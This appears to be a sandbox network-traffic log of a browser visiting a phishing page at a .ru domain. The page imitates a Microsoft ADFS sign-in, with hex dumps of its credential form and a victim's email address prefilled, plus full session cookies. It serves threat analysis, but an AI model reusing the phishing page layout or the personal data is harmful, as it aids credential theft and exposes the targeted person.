                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1592INData Raw: 38 20 32 30 34 38 22 20 77 69 64 74 68 3d 22 31 35 22 20 68 65 69 67 68 74 3d 22 31 35 22 20 66 69 6c 6c 3d 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 70 78 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 32 30 34 38 20 39 36 30 71 30 20 32 36 2d 31 39 20 34 35 74 2d 34 35 20 31 39 48 32 31 39 6c 37 38 36 20 37 38 37 71 31 39 20 31 39 20 31 39 20 34 35 74 2d 31 39 20 34 35 2d 34 35 20 31 39 71 2d 32 36 20 30 2d 34 35 2d 31 39 4c 32 32 20 31 30 30 38 71 2d 31 31 2d 31 31 2d 31 36 2d 32 32 74 2d 36 2d 32 36 71 30 2d 31 35 20 35 2d 32 36 74 31 37 2d 32 32 4c 39 31 35 20 31 39 71 31 39 2d 31 39 20 34 35 2d 31 39 74 34 35 20 31 39 20 31 39 20 34 35 71 30
                                                                                                                                                                                                                                                                                                              Data Ascii: 8 2048" width="15" height="15" fill="currentColor" style="margin-top: 4px;"> <path d="M2048 960q0 26-19 45t-45 19H219l786 787q19 19 19 45t-19 45-45 19q-26 0-45-19L22 1008q-11-11-16-22t-6-26q0-15 5-26t17-22L915 19q19-19 45-19t45 19 19 45q0
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1594INData Raw: 20 63 6c 61 73 73 3d 22 61 64 66 73 77 6f 72 6b 2d 61 72 65 61 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 62 79 53 65 6c 65 63 74 69 6f 6e 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 72 6f 75 70 4d 61 72 67 69 6e 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 53 69 67 6e 20 69 6e 20 77 69 74 68 20 6f 6e 65 20 6f 66 20 74 68 65 73 65 20 61 63 63 6f 75 6e 74 73 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 6d 75 6c 74 69 70 6c 65 61 63 63 6f 75 6e 74 73 61 64 66 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                              Data Ascii: class="adfswork-area"> <div id="bySelection"> <div class="groupMargin"> Sign in with one of these accounts </div> <div id="multipleaccountsadfs">
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1595INData Raw: 35 30 62 0d 0a 64 65 62 61 72 22 20 6e 61 6d 65 3d 22 55 73 65 72 4e 61 6d 65 22 20 74 79 70 65 3d 22 65 6d 61 69 6c 22 20 76 61 6c 75 65 3d 22 64 68 79 64 65 40 64 73 69 2e 63 6f 6d 22 20 74 61 62 69 6e 64 65 78 3d 22 31 22 20 63 6c 61 73 73 3d 22 74 65 78 74 20 66 75 6c 6c 57 69 64 74 68 22 20 73 70 65 6c 6c 63 68 65 63 6b 3d 22 66 61 6c 73 65 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 73 6f 6d 65 6f 6e 65 40 65 78 61 6d 70 6c 65 2e 63 6f 6d 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 69 64 3d 22 61 64 66 73 70 61 73 73 77 6f 72 64 73 69 64 65 62 61 72 22 20 6e 61 6d 65 3d 22 50 61 73 73 77 6f 72 64 22 20 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 20
                                                                                                                                                                                                                                                                                                              Data Ascii: 50bdebar" name="UserName" type="email" value="dhyde@dsi.com" tabindex="1" class="text fullWidth" spellcheck="false" placeholder="someone@example.com" autocomplete="off"> <input id="adfspasswordsidebar" name="Password" type="password"
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:16 UTC1596INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              125192.168.2.1649841104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1596OUTGET /web5/assets/officelogo.png HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/web5/assets/pages/1rd551.css?cb=1698251258165
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260; XSRF-TOKEN=eyJpdiI6Ik5Rb09UQ1VOdjBvVHZTZ2dvY2EzcVE9PSIsInZhbHVlIjoiQXNjeTdFTlladXpTZWRlOWdXeXNOUmNyVk1IVnE0NmxlQldGWE51SDVKVk4vMHZuT0VDTTRrOFNEZlgzUC9md01BRkgxRlFvNUJ3TmhGRlJzc3Y0UVUzVG5yNlVnOUJacWMzcHBUVXhlZEd2dGc4STVqbEQ5U2V6VXpTKzFhUnoiLCJtYWMiOiIxZWQ3MjY0YjJkOWZmMzYyNzkxZWY3NWMxMDE1ZDAxNTY4ZTRmMGQ2MzQxYmUzNDNlNTVkNWE1YmM0MzFiY2MwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlHNnlLU3N5VVRhem1oZ3NRT3Yrbnc9PSIsInZhbHVlIjoidlFZWnM3RGRqMmo0ZmJyNFJjUnIyNTgveTJnUkozQVVFTm5VTlV5L1NacjhiVDRIQ2gzRmc4QUVNbUQ1eUxlT3prQnNuSHNvdVNMN3hBMVBZRDlWaklZeEtBQy9uK21DTzBWTTVoUHFFNlVlYlJuOW5IL0hKWlhSdjh0U3NBd1QiLCJtYWMiOiI4ZGU4NjliOGJjYTcwMjZhYzYzNTI2YzdhZTRiYTI0YmJjODliYjIwYThlNTEwODUxMzYxMzQ2MzZhNDRjNDI0IiwidGFnIjoiIn0%3D


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              126192.168.2.1649840104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1597OUTGET /web5/assets/microsoftfavicon.ico HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmc
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260; XSRF-TOKEN=eyJpdiI6Ik5Rb09UQ1VOdjBvVHZTZ2dvY2EzcVE9PSIsInZhbHVlIjoiQXNjeTdFTlladXpTZWRlOWdXeXNOUmNyVk1IVnE0NmxlQldGWE51SDVKVk4vMHZuT0VDTTRrOFNEZlgzUC9md01BRkgxRlFvNUJ3TmhGRlJzc3Y0UVUzVG5yNlVnOUJacWMzcHBUVXhlZEd2dGc4STVqbEQ5U2V6VXpTKzFhUnoiLCJtYWMiOiIxZWQ3MjY0YjJkOWZmMzYyNzkxZWY3NWMxMDE1ZDAxNTY4ZTRmMGQ2MzQxYmUzNDNlNTVkNWE1YmM0MzFiY2MwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlHNnlLU3N5VVRhem1oZ3NRT3Yrbnc9PSIsInZhbHVlIjoidlFZWnM3RGRqMmo0ZmJyNFJjUnIyNTgveTJnUkozQVVFTm5VTlV5L1NacjhiVDRIQ2gzRmc4QUVNbUQ1eUxlT3prQnNuSHNvdVNMN3hBMVBZRDlWaklZeEtBQy9uK21DTzBWTTVoUHFFNlVlYlJuOW5IL0hKWlhSdjh0U3NBd1QiLCJtYWMiOiI4ZGU4NjliOGJjYTcwMjZhYzYzNTI2YzdhZTRiYTI0YmJjODliYjIwYThlNTEwODUxMzYxMzQ2MzZhNDRjNDI0IiwidGFnIjoiIn0%3D


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              127192.168.2.1649842104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1599OUTGET /web5/assets/js/pages.min.js?cb=1698251258165 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmc
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260; XSRF-TOKEN=eyJpdiI6Ik5Rb09UQ1VOdjBvVHZTZ2dvY2EzcVE9PSIsInZhbHVlIjoiQXNjeTdFTlladXpTZWRlOWdXeXNOUmNyVk1IVnE0NmxlQldGWE51SDVKVk4vMHZuT0VDTTRrOFNEZlgzUC9md01BRkgxRlFvNUJ3TmhGRlJzc3Y0UVUzVG5yNlVnOUJacWMzcHBUVXhlZEd2dGc4STVqbEQ5U2V6VXpTKzFhUnoiLCJtYWMiOiIxZWQ3MjY0YjJkOWZmMzYyNzkxZWY3NWMxMDE1ZDAxNTY4ZTRmMGQ2MzQxYmUzNDNlNTVkNWE1YmM0MzFiY2MwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlHNnlLU3N5VVRhem1oZ3NRT3Yrbnc9PSIsInZhbHVlIjoidlFZWnM3RGRqMmo0ZmJyNFJjUnIyNTgveTJnUkozQVVFTm5VTlV5L1NacjhiVDRIQ2gzRmc4QUVNbUQ1eUxlT3prQnNuSHNvdVNMN3hBMVBZRDlWaklZeEtBQy9uK21DTzBWTTVoUHFFNlVlYlJuOW5IL0hKWlhSdjh0U3NBd1QiLCJtYWMiOiI4ZGU4NjliOGJjYTcwMjZhYzYzNTI2YzdhZTRiYTI0YmJjODliYjIwYThlNTEwODUxMzYxMzQ2MzZhNDRjNDI0IiwidGFnIjoiIn0%3D


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              128192.168.2.1649845104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1600OUTGET /web5/info HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260; XSRF-TOKEN=eyJpdiI6Ik5Rb09UQ1VOdjBvVHZTZ2dvY2EzcVE9PSIsInZhbHVlIjoiQXNjeTdFTlladXpTZWRlOWdXeXNOUmNyVk1IVnE0NmxlQldGWE51SDVKVk4vMHZuT0VDTTRrOFNEZlgzUC9md01BRkgxRlFvNUJ3TmhGRlJzc3Y0UVUzVG5yNlVnOUJacWMzcHBUVXhlZEd2dGc4STVqbEQ5U2V6VXpTKzFhUnoiLCJtYWMiOiIxZWQ3MjY0YjJkOWZmMzYyNzkxZWY3NWMxMDE1ZDAxNTY4ZTRmMGQ2MzQxYmUzNDNlNTVkNWE1YmM0MzFiY2MwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlHNnlLU3N5VVRhem1oZ3NRT3Yrbnc9PSIsInZhbHVlIjoidlFZWnM3RGRqMmo0ZmJyNFJjUnIyNTgveTJnUkozQVVFTm5VTlV5L1NacjhiVDRIQ2gzRmc4QUVNbUQ1eUxlT3prQnNuSHNvdVNMN3hBMVBZRDlWaklZeEtBQy9uK21DTzBWTTVoUHFFNlVlYlJuOW5IL0hKWlhSdjh0U3NBd1QiLCJtYWMiOiI4ZGU4NjliOGJjYTcwMjZhYzYzNTI2YzdhZTRiYTI0YmJjODliYjIwYThlNTEwODUxMzYxMzQ2MzZhNDRjNDI0IiwidGFnIjoiIn0%3D


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              129192.168.2.1649844104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1601OUTGET /web5/assets/back.png HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmc
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260; XSRF-TOKEN=eyJpdiI6Ik5Rb09UQ1VOdjBvVHZTZ2dvY2EzcVE9PSIsInZhbHVlIjoiQXNjeTdFTlladXpTZWRlOWdXeXNOUmNyVk1IVnE0NmxlQldGWE51SDVKVk4vMHZuT0VDTTRrOFNEZlgzUC9md01BRkgxRlFvNUJ3TmhGRlJzc3Y0UVUzVG5yNlVnOUJacWMzcHBUVXhlZEd2dGc4STVqbEQ5U2V6VXpTKzFhUnoiLCJtYWMiOiIxZWQ3MjY0YjJkOWZmMzYyNzkxZWY3NWMxMDE1ZDAxNTY4ZTRmMGQ2MzQxYmUzNDNlNTVkNWE1YmM0MzFiY2MwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlHNnlLU3N5VVRhem1oZ3NRT3Yrbnc9PSIsInZhbHVlIjoidlFZWnM3RGRqMmo0ZmJyNFJjUnIyNTgveTJnUkozQVVFTm5VTlV5L1NacjhiVDRIQ2gzRmc4QUVNbUQ1eUxlT3prQnNuSHNvdVNMN3hBMVBZRDlWaklZeEtBQy9uK21DTzBWTTVoUHFFNlVlYlJuOW5IL0hKWlhSdjh0U3NBd1QiLCJtYWMiOiI4ZGU4NjliOGJjYTcwMjZhYzYzNTI2YzdhZTRiYTI0YmJjODliYjIwYThlNTEwODUxMzYxMzQ2MzZhNDRjNDI0IiwidGFnIjoiIn0%3D


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              13192.168.2.164974963.140.38.180443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:19 UTC218OUTGET /b/ss/adbadobeinddprod/1/JS-1.4.2-D56H/s52294029732250?AQB=1&ndh=1&pf=1&t=25%2F9%2F2023%2018%3A27%3A18%203%20-120&D=D%3D&fid=31A41D21EBE6E61C-3B51C91A92692506&ce=UTF-8&cdp=2&fpCookieDomainPeriods=2&g=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&AQE=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: sstats.adobe.com
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                              Referer: https://indd.adobe.com/
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: sat_domain=A; s_fid=31A41D21EBE6E61C-3B51C91A92692506; s_cc=true


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              130192.168.2.1649843104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1603OUTGET /web5/assets/key.png HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmc
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260; XSRF-TOKEN=eyJpdiI6Ik5Rb09UQ1VOdjBvVHZTZ2dvY2EzcVE9PSIsInZhbHVlIjoiQXNjeTdFTlladXpTZWRlOWdXeXNOUmNyVk1IVnE0NmxlQldGWE51SDVKVk4vMHZuT0VDTTRrOFNEZlgzUC9md01BRkgxRlFvNUJ3TmhGRlJzc3Y0UVUzVG5yNlVnOUJacWMzcHBUVXhlZEd2dGc4STVqbEQ5U2V6VXpTKzFhUnoiLCJtYWMiOiIxZWQ3MjY0YjJkOWZmMzYyNzkxZWY3NWMxMDE1ZDAxNTY4ZTRmMGQ2MzQxYmUzNDNlNTVkNWE1YmM0MzFiY2MwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlHNnlLU3N5VVRhem1oZ3NRT3Yrbnc9PSIsInZhbHVlIjoidlFZWnM3RGRqMmo0ZmJyNFJjUnIyNTgveTJnUkozQVVFTm5VTlV5L1NacjhiVDRIQ2gzRmc4QUVNbUQ1eUxlT3prQnNuSHNvdVNMN3hBMVBZRDlWaklZeEtBQy9uK21DTzBWTTVoUHFFNlVlYlJuOW5IL0hKWlhSdjh0U3NBd1QiLCJtYWMiOiI4ZGU4NjliOGJjYTcwMjZhYzYzNTI2YzdhZTRiYTI0YmJjODliYjIwYThlNTEwODUxMzYxMzQ2MzZhNDRjNDI0IiwidGFnIjoiIn0%3D


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              131192.168.2.1649846152.199.4.44443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1604OUTGET /shared/1.0/content/images/close_790189870c9543725dc3f5a15fb25e46.svg HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: aadcdn.msftauth.net
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1613INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                                                                                                              Age: 13002575
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Content-MD5: rp+/fadJKxLUo+jgFmYTeQ==
                                                                                                                                                                                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:29:17 GMT
                                                                                                                                                                                                                                                                                                              Etag: 0x8DB5C3F4721247A
                                                                                                                                                                                                                                                                                                              Last-Modified: Wed, 24 May 2023 10:11:44 GMT
                                                                                                                                                                                                                                                                                                              Server: ECAcc (dcb/7E86)
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              X-Cache: HIT
                                                                                                                                                                                                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                              x-ms-request-id: fb92ba1f-001e-002c-5d1e-916c57000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                              Content-Length: 270
                                                                                                                                                                                                                                                                                                              Connection: close
